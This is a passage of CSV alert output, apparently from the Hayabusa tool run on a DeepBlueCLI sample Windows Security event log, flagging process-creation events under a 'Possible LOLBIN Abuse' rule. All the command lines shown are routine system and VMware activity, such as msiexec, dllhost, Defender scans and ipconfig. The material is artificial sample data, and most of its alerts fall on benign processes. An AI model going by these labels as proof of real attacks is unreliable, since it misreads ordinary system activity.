+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan 
-ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:25:27.075 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: 
C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
